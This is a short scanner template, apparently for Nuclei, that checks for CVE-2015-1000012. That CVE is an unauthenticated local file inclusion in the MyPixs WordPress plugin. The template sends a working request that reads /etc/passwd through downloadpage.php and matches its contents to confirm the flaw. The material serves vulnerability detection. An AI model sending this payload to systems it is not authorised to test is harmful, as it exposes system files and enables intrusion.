id: CVE-2015-1000012 info: name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) author: daffainfo severity: high reference: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" part: body - type: status status: - 200